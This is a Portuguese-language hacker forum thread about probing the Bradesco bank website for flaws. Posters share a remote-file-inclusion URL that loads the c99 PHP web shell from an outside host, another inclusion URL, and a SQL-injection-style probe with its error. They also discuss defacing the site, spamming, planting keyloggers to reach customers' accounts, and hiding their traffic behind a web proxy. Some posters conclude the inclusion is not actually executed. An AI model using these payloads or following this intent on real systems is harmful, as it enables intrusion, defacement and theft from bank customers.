http://www.bradesco.com.br/indexpf.phtm ... om/c99.txt (http://www.bradesco.com.br/indexpf.phtml?pag=http://www.evilc0der.com/c99.txt)?
:/
Melhor fazer spam ou um deface?
http://www.bradesco.com.br/indexpf.phtm ... config.php (http://www.bradesco.com.br/indexpf.phtml?pag=http://wow.runic.co.kr/bbs/config.php)?
vaikarai info
Hacker banker
desculpe tive que apagar pq o deface vai ser meu xD
Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...
Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH
Eita, pô!!
Hauhauhauhauhauhauhauhau
E eu aqui pensando que meu banco era seguro...
... deu até vergonha agora. hauhauhauhauhauhauhau
Abraços.
Quote from: "Wuefez"Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...
Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH
E isso eu reparei agora.. mais os adiministrador do banco era pra ter mais responsabilidade pq caso um site desse seja invadido o hacker mal intencionado pode por um auto infect na tela principal e infectar varios cliente e com isso tendo acesso as conta bancrias...
Erro
http://institucional.bradesco.com.br/Ne ... t.aspx?h=' (http://institucional.bradesco.com.br/NetRedeAtendimento/site/content/agencia/default.aspx?h=')\\
para o bem de todos e felicidade geral da nação, por favor quando mandar os links mande através de um webproxy, tipo assim
http://250.eu/surf.php?q=aHR0cDovL2luc3 ... %3D&hl=3ed (http://250.eu/surf.php?q=aHR0cDovL2luc3RpdHVjaW9uYWwuYnJhZGVzY28uY29tLmJyL05ldFJlZGVBdGVuZGltZW50by9zaXRlL2NvbnRlbnQvYWdlbmNpYS9kZWZhdWx0LmFzcHg%2FaD0lMjdcXA%3D%3D&hl=3ed)
Consertaram né?!
Com uma falha dessa
entrando no servidor
era só colocar em applet
plugin do keylogger e
fazer a festa
Eita nos, nao estamos tento banco seguro mais nao :o
Quote from: "vaikarai"Erro
http://institucional.bradesco.com.br/Ne ... t.aspx?h=' (http://institucional.bradesco.com.br/NetRedeAtendimento/site/content/agencia/default.aspx?h=')\\
O script do cara converte a string pra numero (int) antes de jogar na consulta ao banco de dados...
Como a conversão não funciona, ele joga esse erro e mata o script a partir desse ponto...
Bora fazer alguma coisa nessa falha ae
lol mesmo! rsrs
PenTest nos bancos agora? ^^
Lamentável isso...
Um "profissional" responsável pela segurança de sites bancário deixando falhas como essas...
A da caixa nem se comenta, já virou festa! o/
Tsc tsc...
Quote from: "psycho"Bora fazer alguma coisa nessa falha ae 
Como foi dito o servidor não está processando \o/
Quote from: "psycho"Bora fazer alguma coisa nessa falha ae :P
mais tipo assim se ninguem mais souber dessa falha, mais somente o DK isso sera muito bom pra nossa reputaçao lol
Quote from: "kortcx"Como foi dito o servidor não está processando \o/
sera q naum tem como fazer ele processar naum?
Olha gostei dessa ideia de pedi patrocinio para o DK...haushaushaush....que pena o servidor nao esta processando
QuoteComo foi dito o servidor não está processando \o/
Realmente, Pelo motivo de redirecionar para enviador
de spam pensei que estava processando, Mais depois
vi que não está... Então não é nenhuma falha hehe
Que falha?
Eles não dão a minima pra esse tipo de "falha".
acabei de abrir uma conta.............e o banco tem uma falha dessa..........
Onde vamos parar